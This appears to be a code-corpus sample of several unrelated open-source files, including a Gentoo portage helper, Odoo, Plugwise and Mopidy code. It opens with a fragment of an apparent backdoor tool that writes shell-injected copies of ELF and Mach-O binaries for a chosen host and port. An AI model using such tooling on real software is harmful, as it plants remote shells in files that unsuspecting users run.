PORT=port, CAVE_JUMPING=False)
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
elif is_supported is "ELF":
supported_file = elfbin.elfbin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
for aShell in supported_file.avail_shells:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
supported_file = elfbin.elfbin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port)
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
elif is_supported is "MACHO":
supported_file = machobin.machobin(FILE=file, OUTPUT=None, SHELL='none')
supported_file.run_this()
for aShell in supported_file.avail_shells:
if 'cave_miner' in aShell or 'user_supplied' in aShell:
continue
aName = aShell + "." + str(host) + "." + str(port) + "." + file
print "Creating File:", aName
supported_file = machobin.machobin(FILE=file, OUTPUT=aName,
SHELL=aShell, HOST=host,
PORT=port, FAT_PRIORITY='ALL')
result = supported_file.run_this()
outputfiles[aName] = result
port += 1
print "Successful files are in backdoored:"
for afile, aresult in outputfiles.iteritems():
if aresult is True:
print afile, 'Success'
else:
print afile, 'Fail'
os.remove('backdoored/' + afile)
|
prometheanfire/portage
|
bin/dohtml.py
|
Python
|
gpl-2.0
| 6,987
| 0.025619
|
#!/usr/bin/python
# Copyright 1999-2013 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
#
# Typical usage:
# dohtml -r docs/*
# - put all files and directories in docs into /usr/share/doc/${PF}/html
# dohtml foo.html
# - put foo.html into /usr/share/doc/${PF}/html
#
#
# Detailed usage:
# dohtml <list-of-files>
# - will install the files in the list of files (space-separated list) into
# /usr/share/doc/${PF}/html, provided the file ends in .css, .gif, .htm,
# .html, .jpeg, .jpg, .js or .png.
# dohtml -r <list-of-files-and-directories>
# - will do as 'dohtml', but recurse into all directories, as long as the
# directory name is not CVS
# dohtml -A jpe,java [-r] <list-of-files[-and-directories]>
# - will do as 'dohtml' but add .jpe,.java (default filter list is
# added to your list)
# dohtml -a png,gif,html,htm [-r] <list-of-files[-and-directories]>
# - will do as 'dohtml' but filter on .png,.gif,.html,.htm (default filter
# list is ignored)
# dohtml -x CVS,SCCS,RCS -r <list-of-files-and-directories>
# - will do as 'dohtml -r', but ignore directories named CVS, SCCS, RCS
#
from __future__ import print_function
import os
import shutil
import sys
from portage.util import normalize_path
# Change back to original cwd _after_ all imports (bug #469338).
os.chdir(os.environ["__PORTAGE_HELPER_CWD"])
def dodir(path):
try:
os.makedirs(path, 0o755)
except OSError:
if not os.path.isdir(path):
raise
os.chmod(path, 0o755)
def dofile(src,dst):
shutil.copy(src, dst)
os.chmod(dst, 0o644)
def eqawarn(lines):
cmd = "source '%s/isolated-functions.sh' ; " % \
os.environ["PORTAGE_BIN_PATH"]
for line in lines:
cmd += "eqawarn \"%s\" ; " % line
os.spawnlp(os.P_WAIT, "bash", "bash", "-c", cmd)
skipped_directories = []
skipped_files = []
warn_on_skipped_files = os.environ.get("PORTAGE_DOHTML_WARN_ON_SKIPPED_FILES") is not None
unwarned_skipped_extensions = os.environ.get("PORTAGE_DOHTML_UNWARNED_SKIPPED_EXTENSIONS", "").split()
unwarned_skipped_files = os.environ.get("PORTAGE_DOHTML_UNWARNED_SKIPPED_FILES", "").split()
def install(basename, dirname, options, prefix=""):
fullpath = basename
if prefix:
fullpath = os.path.join(prefix, fullpath)
if dirname:
fullpath = os.path.join(dirname, fullpath)
if options.DOCDESTTREE:
desttree = options.DOCDESTTREE
else:
desttree = "html"
destdir = os.path.join(options.ED, "usr", "share", "doc",
options.PF.lstrip(os.sep), desttree.lstrip(os.sep),
options.doc_prefix.lstrip(os.sep), prefix).rstrip(os.sep)
if not os.path.exists(fullpath):
sys.stderr.write("!!! dohtml: %s does not exist\n" % fullpath)
return False
elif os.path.isfile(fullpath):
ext = os.path.splitext(basename)[1][1:]
if ext in options.allowed_exts or basename in options.allowed_files:
dodir(destdir)
dofile(fullpath, os.path.join(destdir, basename))
elif warn_on_skipped_files and ext not in unwarned_skipped_extensions and basename not in unwarned_skipped_files:
skipped_files.append(fullpath)
elif options.recurse and os.path.isdir(fullpath) and \
basename not in options.disallowed_dirs:
for i in os.listdir(fullpath):
pfx = basename
if prefix:
pfx = os.path.join(prefix, pfx)
install(i, dirname, options, pfx)
elif not options.recurse and os.path.isdir(fullpath):
global skipped_directories
skipped_directories.append(fullpath)
return False
else:
return False
return True
class OptionsClass:
def __init__(self):
self.PF = ""
self.ED = ""
self.DOCDESTTREE = ""
if "PF" in os.environ:
self.PF = os.environ["PF"]
if self.PF:
self.PF = normalize_path(self.PF)
if "force-prefix" not in os.environ.get("FEATURES", "").split() and \
os.environ.get("EAPI", "0") in ("0", "1", "2"):
self.ED = os.environ.get("D", "")
else:
self.ED = os.environ.get("ED", "")
if self.ED:
self.ED = normalize_path(self.ED)
if "_E_DOCDESTTREE_" in os.environ:
self.DOCDESTTREE = os.environ["_E_DOCDESTTREE_"]
if self.DOCDESTTREE:
self.DOCDESTTREE = normalize_path(self.DOCDESTTREE)
self.allowed_exts = ['css', 'gif', 'htm', 'html', 'jpeg', 'jpg', 'js', 'png']
if os.environ.get("EAPI", "0") in ("4-python", "5-progress"):
self.allowed_exts += ['ico', 'svg', 'xhtml', 'xml']
self.allowed_files = []
self.disallowed_dirs = ['CVS']
self.recurse = False
self.verbose = False
self.doc_prefix = ""
def print_help():
opts = OptionsClass()
print("dohtml [-a .foo,.bar] [-A .foo,.bar] [-f foo,bar] [-x foo,bar]")
print(" [-r] [-V] <file> [file ...]")
print()
print(" -a Set the list of allowed to those that are specified.")
print(" Default:", ",".join(opts.allowed_exts))
print(" -A Extend the list of allowed file types.")
print(" -f Set list of allowed extensionless file names.")
print(" -x Set directories to be excluded from recursion.")
print(" Default:", ",".join(opts.disallowed_dirs))
print(" -p Set a document prefix for installed files (empty by default).")
print(" -r Install files and directories recursively.")
print(" -V Be verbose.")
print()
def parse_args():
options = OptionsClass()
args = []
x = 1
while x < len(sys.argv):
arg = sys.argv[x]
if arg in ["-h","-r","-V"]:
if arg == "-h":
print_help()
sys.exit(0)
elif arg == "-r":
options.recurse = True
elif arg == "-V":
options.verbose = True
elif sys.argv[x] in ["-A","-a","-f","-x","-p"]:
x += 1
if x == len(sys.argv):
print_help()
sys.exit(0)
elif arg == "-p":
options.doc_prefix = sys.argv[x]
if options.doc_prefix:
options.doc_prefix = normalize_path(options.doc_prefix)
else:
values = sys.argv[x].split(",")
if arg == "-A":
options.allowed_exts.extend(values)
elif arg == "-a":
options.allowed_exts = values
elif arg == "-f":
options.allowed_files = values
elif arg == "-x":
options.disallowed_dirs = v
|
alues
|
else:
args.append(sys.argv[x])
x += 1
return (options, args)
def main():
(options, args) = parse_args()
if options.verbose:
print("Allowed extensions:", options.allowed_exts)
print("Document prefix : '" + options.doc_prefix + "'")
print("Allowed files :", options.allowed_files)
success = False
endswith_slash = (os.sep, os.sep + ".")
for x in args:
trailing_slash = x.endswith(endswith_slash)
x = normalize_path(x)
if trailing_slash:
# Modify behavior of basename and dirname
# as noted in bug #425214, causing foo/ to
# behave similarly to the way that foo/*
# behaves.
x += os.sep
basename = os.path.basename(x)
dirname = os.path.dirname(x)
success |= install(basename, dirname, options)
for x in skipped_directories:
eqawarn(["QA Notice: dohtml on directory '%s' without recursion option" % x])
for x in skipped_files:
eqawarn(["dohtml: skipped file '%s'" % x])
if success:
retcode = 0
else:
retcode = 1
sys.exit(retcode)
if __name__ == "__main__":
main()
|
Jgarcia-IAS/Fidelizacion_odoo
|
openerp/addons/sale_stock/sale_stock.py
|
Python
|
agpl-3.0
| 24,595
| 0.005733
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime, timedelta
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT, DATETIME_FORMATS_MAP, float_compare
from openerp.osv import fields, osv
from openerp.tools.safe_eval import safe_eval as eval
from openerp.tools.translate import _
import pytz
from openerp import SUPERUSER_ID
class sale_order(osv.osv):
_inherit = "sale.order"
def _get_default_warehouse(self, cr, uid, context=None):
company_id = self.pool.get('res.users')._get_company(cr, uid, context=context)
warehouse_ids = self.pool.get('stock.warehouse').search(cr, uid, [('company_id', '=', company_id)], context=context)
if not warehouse_ids:
return False
return warehouse_ids[0]
def _get_shipped(self, cr, uid, ids, name, args, context=None):
res = {}
for sale in self.browse(cr, uid, ids, context=context):
group = sale.procurement_group_id
if group:
res[sale.id] = all([proc.state in ['cancel', 'done'] for proc in group.procurement_ids])
else:
res[sale.id] = False
return res
def _get_orders(self, cr, uid, ids, context=None):
res = set()
for move in self.browse(cr, uid, ids, context=context):
if move.procurement_id and move.procurement_id.sale_line_id:
res.add(move.procurement_id.sale_line_id.order_id.id)
return list(res)
def _get_orders_procurements(self, cr, uid, ids, context=None):
res = set()
for proc in self.pool.get('procurement.order').browse(cr, uid, ids, context=context):
if proc.state =='done' and proc.sale_line_id:
res.add(proc.sale_line_id.order_id.id)
return list(res)
def _get_picking_ids(self, cr, uid, ids, name, args, context=None):
res = {}
for sale in self.browse(cr, uid, ids, context=context):
if not sale.procurement_group_id:
res[sale.id] = []
continue
res[sale.id] = self.pool.get('stock.picking').search(cr, uid, [('group_id', '=', sale.procurement_group_id.id)], context=context)
return res
def _prepare_order_line_procurement(self, cr, uid, order, line, group_id=False, context=None):
vals = super(sale_order, self)._prepare_order_line_procurement(cr, uid, order, line, group_id=group_id, context=context)
location_id = order.partner_shipping_id.property_stock_customer.id
vals['location_id'] = location_id
routes = line.route_id and [(4, line.route_id.id)] or []
vals['route_ids'] = routes
vals['warehouse_id'] = order.warehouse_id and order.warehouse_id.id or False
vals['partner_dest_id'] = order.partner_shipping_id.id
return vals
_columns = {
'incoterm': fields.many2one('stock.incoterms', 'Incoterm', help="International Commercial Terms are a series of predefined commercial terms used in international transactions."),
'picking_policy': fields.selection([('direct', 'Deliver each product when available'), ('one', 'Deliver all products at once')],
'Shipping Policy', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]},
help="""Pick 'Deliver each product when available' if you allow partial delivery."""),
'order_policy': fields.selection([
('manual', 'On Demand'),
('picking', 'On Delivery Order'),
('prepaid', 'Before Delivery'),
], 'Create Invoice', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]},
help="""On demand: A draft invoice can be created from the sales order when needed. \nOn delivery order: A draft invoice can be created from the delivery order when the products have been delivered. \nBefore delivery: A draft invoice is created from the sales order and must be paid before the products can be delivered."""),
'shipped': fields.function(_get_shipped, string='Delivered', type='boolean', store={
'procurement.order': (_get_orders_procurements, ['state'], 10)
}),
'warehouse_id': fields.many2one('stock.warehouse', 'Warehouse', required=True),
'picking_ids': fields.function(_get_picking_ids, method=True, type='one2many', relation='stock.picking', string='Picking associated to this sale'),
}
_defaults = {
'warehouse_id': _get_default_warehouse,
'picking_policy': 'direct',
'order_policy': 'manual',
}
def onchange_warehouse_id(self, cr, uid, ids, warehouse_id, context=None):
val = {}
if warehouse_id:
warehouse = self.pool.get('stock.warehouse').browse(cr, uid, warehouse_id, context=context)
if warehouse.company_id:
val['company_id'] = warehouse.company_id.id
return {'value': val}
def action_view_delivery(self, cr, uid, ids, context=None):
'''
This function returns an action that display existing delivery orders
of given sales order ids. It can e
|
ither be a in a list or in a form
view, if there is only one delivery order to show.
'''
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
result = mod_obj.get_object_reference(cr, uid, 'stock', 'action_p
|
icking_tree_all')
id = result and result[1] or False
result = act_obj.read(cr, uid, [id], context=context)[0]
#compute the number of delivery orders to display
pick_ids = []
for so in self.browse(cr, uid, ids, context=context):
pick_ids += [picking.id for picking in so.picking_ids]
#choose the view_mode accordingly
if len(pick_ids) > 1:
result['domain'] = "[('id','in',[" + ','.join(map(str, pick_ids)) + "])]"
else:
res = mod_obj.get_object_reference(cr, uid, 'stock', 'view_picking_form')
result['views'] = [(res and res[1] or False, 'form')]
result['res_id'] = pick_ids and pick_ids[0] or False
return result
def action_invoice_create(self, cr, uid, ids, grouped=False, states=['confirmed', 'done', 'exception'], date_invoice = False, context=None):
move_obj = self.pool.get("stock.move")
res = super(sale_order,self).action_invoice_create(cr, uid, ids, grouped=grouped, states=states, date_invoice = date_invoice, context=context)
for order in self.browse(cr, uid, ids, context=context):
if order.order_policy == 'picking':
for picking in order.picking_ids:
move_obj.write(cr, uid, [x.id for x in picking.move_lines], {'invoice_state': 'invoiced'}, context=context)
return res
def action_wait(self, cr, uid, ids, context=None):
res = super(sale_order, self).action_wait(cr, uid, ids, context=context)
for o in self.browse(cr, uid, ids):
noprod = self.test_no_product(cr, uid, o, context)
if noprod and o.order_policy=='picking':
self.writ
|
gmimano/commcaretest
|
corehq/apps/hqadmin/tasks.py
|
Python
|
bsd-3-clause
| 98
| 0.020408
|
from celery.task import task
import time
@task
def sleep(duration=10):
ti
|
me.sleep(duration)
|
|
google/objax
|
objax/util/check.py
|
Python
|
apache-2.0
| 2,313
| 0.003891
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of
|
the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writi
|
ng, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = ['assert_assigned_type_and_shape_match']
import jax
from objax.typing import JaxArray
TRACER_TYPES = (jax.interpreters.partial_eval.JaxprTracer,
jax.interpreters.partial_eval.DynamicJaxprTracer)
def split_shape_and_device(array):
if isinstance(array, jax.interpreters.pxla.ShardedDeviceArray):
return array.shape[0], array.shape[1:]
else:
return None, array.shape
def assert_assigned_type_and_shape_match(existing_tensor, new_tensor):
assert isinstance(new_tensor, JaxArray.__args__), \
f'Assignments to variable must be an instance of JaxArray, but received f{type(new_tensor)}.'
new_tensor_device, new_tensor_shape = split_shape_and_device(new_tensor)
self_device, self_shape = split_shape_and_device(existing_tensor)
device_mismatch_error = f'Can not replicate a variable that is currently on ' \
f'{self_device} devices to {new_tensor_device} devices.'
assert (new_tensor_device is None) or (self_device is None) or (self_device == new_tensor_device), \
device_mismatch_error
shorter_length = min(len(new_tensor.shape), len(existing_tensor.shape))
is_special_ok = (isinstance(new_tensor, TRACER_TYPES) or isinstance(existing_tensor, TRACER_TYPES))
is_special_ok = is_special_ok and existing_tensor.shape[-shorter_length:] == new_tensor.shape[-shorter_length:]
shape_mismatch_error = f'Assign can not change shape of variable. The current variable shape is {self_shape},' \
f' but the requested new shape is {new_tensor_shape}.'
assert is_special_ok or new_tensor_shape == self_shape or new_tensor.shape == existing_tensor.shape, \
shape_mismatch_error
|
erik/translate
|
translate/client/exceptions.py
|
Python
|
gpl-3.0
| 5,955
| 0
|
# -*- coding: utf-8 -*-
# This file is part of translate.
#
# translate is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# translate is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# translate. If not, see <http://www.gnu.org/licenses/>.
"""
translate.client.exceptions
~~~~~~~~~~~~~~~~~~~~~~~~~~~
These are exception classes that are used by translate.client.Client. Most of
these classes are simple wrappers, just to differentiate different types of
errors. They can be constructed from a requests response object, or JSON
,returned from an API call.
"""
import json
import logging
log = logging.getLogger(__name__)
class TranslateException(Exception):
"""Mostly empty base class for exceptions relating to translate.
This class is used as a catch-all for exceptions thrown by the server. If
possible, a more specific subclass of this exception will be used.
"""
@classmethod
def from_json(cls, obj, status_code=400):
"""Return the proper exception class from the JSON object returned from
the server.
"""
exceptions = {
429: RateLimitException,
431: SizeLimitException,
452: TranslationException,
453: TranslatorException,
454: BadLanguagePairException
}
try:
code = obj['code'] if ('code' in obj) else status_code
klass = exceptions[code]
return klass.from_json(obj)
except KeyError:
return cls("Unknown error occured: " + repr(obj))
@classmethod
def from_response(cls, resp):
"""Generate a proper exception from the given requests response object
and return it.
"""
try:
obj = json.loads(resp.text)
return TranslateException.from_json(obj, resp.status_code)
except ValueError:
log.error("Was given invalid JSON, bailing...")
return TranslateException.from_json({}, resp.status_code)
class HTTPException(TranslateException):
"""Raised when an error occurs with the HTTP connection to the server
(e.g. host is
|
not available, doesn't respond, etc.)
"""
pass
class RateLimitException(TranslateException):
"""Exception raised when a client goes over the rate
|
limit."""
def __init__(self, limit, per, reset):
self.limit = limit
self.per = per
self.reset = reset
@classmethod
def from_json(cls, obj):
try:
details = obj.get('details', {})
return cls(limit=details['limit'], per=details['per'],
reset=details['reset'])
except KeyError:
log.error("Received invalid JSON: " + repr(obj))
return cls(limit=0, per=0, reset=0)
def __str__(self):
return "Rate limit exceeded: {0} reqs / {1}s. Try again at {2}".format(
self.limit, self.per, self.reset)
class SizeLimitException(TranslateException):
"""Exception raised when a client tries to translate a text that is over
the server's size limit.
"""
def __init__(self, len, limit):
self.len = len
self.limit = limit
@classmethod
def from_json(cls, obj):
try:
details = obj['details']
return cls(len=details['len'], limit=details['limit'])
except KeyError:
log.error("Received invalid JSON: %s", repr(obj))
return cls(len=0, limit=0)
def __str__(self):
return "Specified text was too large: %d bytes. Maximum is %d bytes"\
.format(self.len, self.limit)
class TranslationException(TranslateException):
"""Returned on bad parameters to /translate"""
@classmethod
def from_json(cls, obj):
try:
msg = obj['message']
return cls("Bad parameters to translate API method: " + msg)
except KeyError:
log.error("Received invalid JSON: " + repr(obj))
return cls("Bad parameters to translate API method.")
class TranslatorException(TranslateException):
"""Returned when bad parameters are passed to the /translate method. (This
probably indicates some kind of API / Client bug.)
"""
def __init__(self, lang_pair, tried):
self.lang_pair = lang_pair
self.tried = tried
@classmethod
def from_json(cls, obj):
try:
details = obj['details']
pair = (details['from'], details['to'])
return cls(lang_pair=pair, tried=details['tried'])
except KeyError:
log.error("Received invalid JSON: " + repr(obj))
return cls(lang_pair=('unknown', 'unknown'), tried=['unknown'])
def __str__(self):
return "Failed to translate {0} (tried: {1})".format(self.lang_pair,
self.tried)
class BadLanguagePairException(TranslateException):
"""Raised when the client tried to translate using a language pair not
supported by the server
"""
def __init__(self, lang_pair):
self.lang_pair = lang_pair
@classmethod
def from_json(cls, obj):
try:
details = obj['details']
return cls(lang_pair=(details['from'], details['to']))
except KeyError:
log.error("Received invalid JSON: " + repr(obj))
return cls(lang_pair=('unknown', 'unknown'))
def __str__(self):
return "Unsupported language pair: {0}".format(self.lang_pair)
|
SevenW/Plugwise-2-py
|
devtools/Join-2.py
|
Python
|
gpl-3.0
| 58,244
| 0.009546
|
#!/usr/bin/env python3
# Copyright (C) 2012,2013,2014,2015,2016,2017,2018,2019,2020 Seven Watt <info@sevenwatt.com>
# <http://www.sevenwatt.com>
#
# This file is part of Plugwise-2-py.
#
# Plugwise-2-py is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later versi
|
on.
#
# Plugwise-2-py is distributed in the hope that it will be useful,
# but WI
|
THOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Plugwise-2-py. If not, see <http://www.gnu.org/licenses/>.
#
# The program is a major modification and extension to:
# python-plugwise - written in 2011 by Sven Petai <hadara@bsd.ee>
# which itself is inspired by Plugwise-on-Linux (POL):
# POL v0.2 - written in 2009 by Maarten Damen <http://www.maartendamen.com>
from serial.serialutil import SerialException
from plugwise import *
from swutil.util import *
from swutil.pwmqtt import *
from plugwise.api import *
from datetime import datetime, timedelta
import time
import calendar
import subprocess
import glob
import os
import logging
import queue
import threading
import itertools
mqtt = True
try:
import paho.mqtt.client as mosquitto
except:
mqtt = False
print(mqtt)
import pprint as pp
import json
#from json import encoder
#encoder.FLOAT_REPR = lambda o: format(o, '.2f')
json.encoder.FLOAT_REPR = lambda f: ("%.2f" % f)
def jsondefault(object):
return object.decode('utf-8')
#DEBUG_PROTOCOL = False
log_comm(True)
#LOG_LEVEL = 2
schedules_path = "config/schedules"
cfg = json.load(open("config/pw-hostconfig.json"))
tmppath = cfg['tmp_path']+'/'
perpath = cfg['permanent_path']+'/'
logpath = cfg['log_path']+'/'
port = cfg['serial']
epochf = False
if 'log_format' in cfg and cfg['log_format'] == 'epoch':
epochf = True
actdir = 'pwact/'
actpre = 'pwact-'
actpost = '.log'
curpre = 'pwpower'
curpost = '.log'
logdir = 'pwlog/'
logpre = 'pw-'
logpost = '.log'
open_logcomm(logpath+"pw-communication.log")
#prepare for cleanup of /tmp after n days.
cleanage = 604800; # seven days in seconds
locnow = datetime.utcnow()-timedelta(seconds=time.timezone)
now = locnow
yrfolder = str(now.year)+'/'
if not os.path.exists(perpath+yrfolder+actdir):
os.makedirs(perpath+yrfolder+actdir)
if not os.path.exists(perpath+yrfolder+logdir):
os.makedirs(perpath+yrfolder+logdir)
if not os.path.exists(tmppath+yrfolder+actdir):
os.makedirs(tmppath+yrfolder+actdir)
rsyncing = True
if tmppath == None or tmppath == "/":
tmppath = perpath
rsyncing = False
if rsyncing:
# Could be a recovery after a power failure
# /tmp/pwact-* may have disappeared, while the persitent version exists
perfile = perpath + yrfolder + actdir + actpre + now.date().isoformat() + '*' + actpost
cmd = "rsync -aXuq " + perfile + " " + tmppath + yrfolder + actdir
subprocess.call(cmd, shell=True)
class PWControl(object):
"""Main program class
"""
def __init__(self):
"""
...
"""
global port
global tmppath
global curpre
global curpost
self.device = Stick(port, timeout=1)
self.staticconfig_fn = 'config/pw-conf.json'
self.control_fn = 'config/pw-control.json'
#self.schedule_fn = 'config/pw-schedules.json'
self.last_schedule_ts = None
self.last_control_ts = None
self.circles = []
self.schedules = []
self.controls = []
self.controlsjson = dict()
self.save_controls = False
self.bymac = dict()
self.byname = dict()
self.schedulebyname = dict()
self.curfname = tmppath + curpre + curpost
self.curfile = open(self.curfname, 'w')
self.statuslogfname = tmppath+'pw-status.json'
self.statusfile = open(self.statuslogfname, 'w')
self.statusdumpfname = perpath+'pw-statusdump.json'
self.actfiles = dict()
self.logfnames = dict()
self.daylogfnames = dict()
self.lastlogfname = perpath+'pwlastlog.log'
#read the static configuration
sconf = json.load(open(self.staticconfig_fn))
i=0
for item in sconf['static']:
#remove tabs which survive dialect='trimmed'
for key in item:
if isinstance(item[key],str): item[key] = item[key].strip()
item['mac'] = item['mac'].upper()
if item['production'].strip().lower() in ['true', '1', 't', 'y', 'yes', 'on']:
item['production'] = True
if 'revrse_pol' not in item:
item['reverse_pol'] = False
self.bymac[item.get('mac')]=i
self.byname[item.get('name')]=i
#exception handling timeouts done by circle object for init
self.circles.append(Circle(item['mac'], self.device, item))
self.set_interval_production(self.circles[-1])
i += 1
info("adding circle: %s" % (self.circles[-1].name,))
#retrieve last log addresses from persistent storage
with open(self.lastlogfname, 'a+') as f:
f.seek(0)
for line in f:
parts = line.split(',')
mac, logaddr = parts[0:2]
if len(parts) == 4:
idx = int(parts[2])
ts = int(parts[3])
else:
idx = 0
ts = 0
logaddr = int(logaddr)
debug("mac -%s- logaddr -%s- logaddr_idx -%s- logaddr_ts -%s-" % (mac, logaddr, idx, ts))
try:
self.circles[self.bymac[mac]].last_log = logaddr
self.circles[self.bymac[mac]].last_log_idx = idx
self.circles[self.bymac[mac]].last_log_ts = ts
except:
error("PWControl.__init__(): lastlog mac not found in circles")
self.schedulesstat = dict ((f, os.path.getmtime(f)) for f in glob.glob(schedules_path+'/*.json'))
self.schedules = self.read_schedules()
self.poll_configuration()
def get_relays(self):
"""
Update the relay state for circles with schedules enabled.
"""
for c in self.circles:
if c.online and c.schedule_state == 'on':
try:
c.get_info()
except (TimeoutException, SerialException, ValueError) as reason:
debug("Error in get_relays(): %s" % (reason,))
continue
#publish relay_state for schedule-operated circles.
#could also be done unconditionally every 15 minutes in main loop.
self.publish_circle_state(c.mac)
def get_status_json(self, mac):
try:
c = self.circles[self.bymac[mac]]
control = self.controls[self.controlsbymac[mac]]
except:
info("get_status_json: mac not found in circles or controls")
return ""
try:
status = c.get_status()
status["mac"] = status["mac"]
status["monitor"] = (control['monitor'].lower() == 'yes')
status["savelog"] = (control['savelog'].lower() == 'yes')
#json.encoder.FLOAT_REPR = lambda f: ("%.2f" % f)
#msg = json.dumps(status, default = jsondefault)
msg = json.dumps(status)
except (ValueError, TimeoutException, SerialException) as reason:
error("Error in get_status_json: %s" % (reason,))
msg = ""
return str(msg)
def log_status(self):
self.statusfile.seek(0)
self.statusfile.truncate(0)
self.statusfile.write('{"circles": [\n')
comma = False
for c in self.circles:
if comma:
self.statusfile.write(",\n")
|
paulburkinshaw/mopidy-radio-pi
|
mopidy_radio_pi/static/MyHandler.py
|
Python
|
apache-2.0
| 11,919
| 0.043544
|
import SimpleHTTPServer
import sqlite3 as lite
import sys
import urlparse
import datetime
import json
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
class TrackListHandler(BaseHTTPRequestHandler):
def do_OPTIONS(self):
self.send_response(200)
self.send_header('application/json; charset=utf8');
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
self.send_header("Access-Control-Allow-Headers", "X-Requested-With")
self.send_header("Access-Control-Allow-Headers", "Authorization")
def do_GET(self):
parsedParameters = urlparse.urlparse(self.path)
queryParsed = urlparse.parse_qs(parsedParameters.query)
if( 'type' in queryParsed ):
typeString = queryParsed['type']
if('addTrack' in typeString):
trackUriString = queryParsed['trackUri']
userString = queryParsed['user']
dedicateString = queryParsed['dedicate']
commentsString = queryParsed['comments']
self.addTrack(trackUriString, userString, dedicateString, commentsString)
elif('getTrack' in typeString):
trackUriString = queryParsed['trackUri']
self.getTrack(trackUriString)
elif('getTrackRating' in typeString):
trackUriString = queryParsed['trackUri
|
']
self.getTrackRating(trackUriString)
elif('likeTrack' in typeString):
trackUriString = queryParsed['trackUri']
trackNameString = queryPa
|
rsed['trackname']
trackArtistString = queryParsed['artist']
trackAlbumString = queryParsed['album']
self.likeTrack(trackUriString, trackNameString, trackArtistString, trackAlbumString)
elif('voteToSkipTrack' in typeString):
trackUriString = queryParsed['trackUri']
trackNameString = queryParsed['trackname']
trackArtistString = queryParsed['artist']
trackAlbumString = queryParsed['album']
self.voteToSkipTrack(trackUriString, trackNameString, trackArtistString, trackAlbumString)
elif('getTrackVotes' in typeString):
trackUriString = queryParsed['trackUri']
self.getTrackVotes(trackUriString)
elif('getTrackVotesAndRating' in typeString):
trackUriString = queryParsed['trackUri']
self.getTrackVotesAndRating(trackUriString)
elif('getTrendingTracks' in typeString):
self.getTrendingTracks()
elif('shutdownPi' in typeString):
self.shutdownPi()
elif('rebootPi' in typeString):
self.rebootPi()
else:
BaseHTTPRequestHandler.SimpleHTTPRequestHandler.do_GET(self);
def getTrack(self, trackUri):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
con.text_factory = str
with con:
cur = con.cursor()
cur.execute("SELECT TrackUri, ChosenBy, DedicatedTo, Comments FROM Tracklist WHERE TrackUri=:TrackUri", {"TrackUri": trackUri[0]})
con.commit()
row = cur.fetchone()
#returnedTrackUri, returnedChosenBy, returnedComments = cur.fetchone()
print row[0], row[1], row[2], row[3]
self.wfile.write('{0}({1})'.format('jsonpGetTrackCallback', {'userString':row[1], 'dedicatedToString':row[2], 'commentString':row[3]}))
self.wfile.close()
def addTrack(self, trackUri, user, dedicate, comments):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
with con:
cur = con.cursor()
cur.execute("insert into Tracklist (TrackUri, ChosenBy, DedicatedTo, Comments, DateAdded) values (?, ?, ?, ?, date('now'))",(trackUri[0], user[0], dedicate[0], comments[0]))
self.wfile.write('{0}({1})'.format('jsonpAddTrackCallback', {'trackUriString':trackUri[0], 'userString':user[0], 'dedicatedToString':dedicate[0],'commentString':comments[0]}))
self.wfile.close()
def likeTrack(self, trackUri, trackname, artist, album):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
with con:
cur = con.cursor()
cur.execute("Select count(*) from UpVote where HostAddress=:HostAddress AND TrackUri=:TrackUri AND DateVoted=date('now')", {"HostAddress": self.client_address[0], "TrackUri": trackUri[0]})
con.commit()
row = cur.fetchone()
print row[0]
